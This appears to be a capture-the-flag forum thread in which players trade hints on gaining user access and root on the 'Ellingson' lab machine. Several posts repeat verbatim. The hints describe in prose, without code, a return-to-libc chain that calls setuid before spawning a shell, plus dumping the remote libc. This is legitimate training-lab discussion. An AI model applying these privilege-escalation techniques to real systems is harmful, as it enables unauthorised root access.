Got User
thanks @AzAxIaL for nudging me to follow the path and guide on questions & to ensure to read all and really look at that what is there. I was kinda blind. in the end, quite straight fwd to user, basic commands needed etc pp.
Spend a long time on the initial connection, purely because of I missed the first piece of the required key… again a pebkac.
Next challenge root…
Finally rooted, thanks for the help and hints. Manual based on Bitterman with some adjustments and tweaks worked for me. Had a while exploit working, but only with M***o user. took some more to successfully switch over to root
User part is simple, but if you do not want to wait: They do not really listen to The Plague
Root: bitterman + redcross and you are good to go. remote libc is different, so ssh and dump there, not on kali.
Can anyone DM me on root? I’m testing my exploit locally, it’s running well but I’m not getting root - only normal user.
You need an extra step in your chain, if you have popped the Shell as regular user It should be trivial to add this extra call, just before invoking the Shell you need to explicitly set the user id you want.
Just look man for this c function to locate its signature, pop the arguments, call this function in second step ( instead Shell call) return to main again and this time the Shell call and you’ll get your privileged shell
Can anyone DM me on root? I'm testing my exploit locally, it's running well but I'm not getting root - only normal user.
You need an extra step in your chain, if you have popped the Shell as regular user It should be trivial to add this extra call, just before invoking the Shell you need to explicitly set the user id you want.
Just look man for this c function to locate its signature, pop the arguments, call this function in second step ( instead Shell call) return to main again and this time the Shell call and you’ll get your privileged shell
You don’t need to return to main second time, just do both on the same payload
For those testing locally, in my kali the exploit didn’t work, though when i opened the ssh tunnel and put the address of libraries in ellingson it worked fine
Jejejeje, yes It makes all sense, i’ll try as you say. When after some hard sweat i get It working, i admit, i was so Happy jumping around that didn’t notice that… Thanks for your advice, and sorry to anyone that follow my not-completely-right answer, sorry
Can anyone DM me on root? I'm testing my exploit locally, it's running well but I'm not getting root - only normal user.
You need an extra step in your chain, if you have popped the Shell as regular user It should be trivial to add this extra call, just before invoking the Shell you need to explicitly set the user id you want.
Just look man for this c function to locate its signature, pop the arguments, call this function in second step ( instead Shell call) return to main again and this time the Shell call and you’ll get your privileged shell
You don’t need to return to main second time, just do both on the same payload